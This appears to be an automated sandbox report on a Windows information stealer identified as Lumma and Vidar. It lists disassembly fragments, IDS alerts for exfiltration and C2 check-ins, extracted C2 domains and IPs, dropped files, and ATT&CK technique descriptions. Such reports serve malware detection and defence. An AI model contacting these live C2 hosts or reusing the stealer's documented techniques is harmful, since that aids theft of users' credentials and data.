Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [ecx], dx	9_2_0043FF03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2EE0190Fh	9_2_0043FF03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, word ptr [esi+eax]	9_2_0041B054
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, word ptr [esi+eax]	9_2_0041B054
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	9_2_0041B054
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	9_2_0041B054
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, FFFFFFFFh	9_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+14h]	9_2_00412001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi+01h], 00000000h	9_2_004230CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edx], bl	9_2_0040D140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+48h]	9_2_0041A1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+64h]	9_2_004291C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	9_2_00422200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	9_2_00426230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+14h]	9_2_004012F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	9_2_004193C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	9_2_00442380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	9_2_00422480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	9_2_00440554
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	9_2_00440554
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 625B6034h	9_2_00440554
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	9_2_0042B510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	9_2_0043D630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push eax	9_2_004386C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ebx	9_2_0040E6E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp edx	9_2_0043C696
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	9_2_004436A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	9_2_00405770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esp+10h]	9_2_004247E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esp+10h]	9_2_004247E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	9_2_004287AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	9_2_004357B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	9_2_00423940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [esi+ebp+02h], 0000h	9_2_0042998F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	9_2_00424A4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, word ptr [ecx]	9_2_00424A4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx esi, word ptr [edx]	9_2_00424A4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+48h]	9_2_0041AAC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	9_2_00428B4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	9_2_0040EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	9_2_0040EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	9_2_0043CC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	9_2_0041FCFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	9_2_0041CC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, ecx	9_2_0041CC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [ebp-10h]	9_2_00441D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	9_2_00422D6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, eax	9_2_00422D6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	9_2_0042CD06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	9_2_0043AD90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	9_2_0042AFD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, ebp	9_2_00409F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, ebp	9_2_00409F80

Source: Network traffic	Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.4:49767 -> 45.132.206.251:80
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49741 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.165.127:443 -> 192.168.2.4:49742
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.165.127:443 -> 192.168.2.4:49741
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49773 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49773 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49768 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49768 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49764 -> 172.67.204.62:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49771 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49771 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49764 -> 172.67.204.62:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49772 -> 104.21.75.242:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49772 -> 104.21.75.242:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49770 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49775 -> 172.67.192.105:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49770 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49774 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49775 -> 172.67.192.105:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49774 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49766 -> 104.21.88.61:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49766 -> 104.21.88.61:443

Source: Malware configuration extractor	URLs: puredoffustow.shop
Source: Malware configuration extractor	URLs: chickerkuso.shop
Source: Malware configuration extractor	URLs: quotamkdsdqo.shop
Source: Malware configuration extractor	URLs: metallygaricwo.shop
Source: Malware configuration extractor	URLs: milldymarskwom.shop
Source: Malware configuration extractor	URLs: carrtychaintnyw.shop
Source: Malware configuration extractor	URLs: questionmwq.shop
Source: Malware configuration extractor	URLs: opponnentduei.shop
Source: Malware configuration extractor	URLs: achievenmtynwjq.shop
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199780418869

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BAAEHDBFID.exe

C:\ProgramData\HDAFIIDAKJDG\AEHDAK

C:\ProgramData\HDAFIIDAKJDG\DAECGC

C:\ProgramData\HDAFIIDAKJDG\DBFIEH

C:\ProgramData\HDAFIIDAKJDG\EGIIJD

C:\ProgramData\HDAFIIDAKJDG\EHJKKK

C:\ProgramData\HDAFIIDAKJDG\EHJKKK-shm

C:\ProgramData\HDAFIIDAKJDG\FHCAEG

C:\ProgramData\HDAFIIDAKJDG\HDAFII

C:\ProgramData\HDAFIIDAKJDG\IIJEBA

Windows Analysis Report
file.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre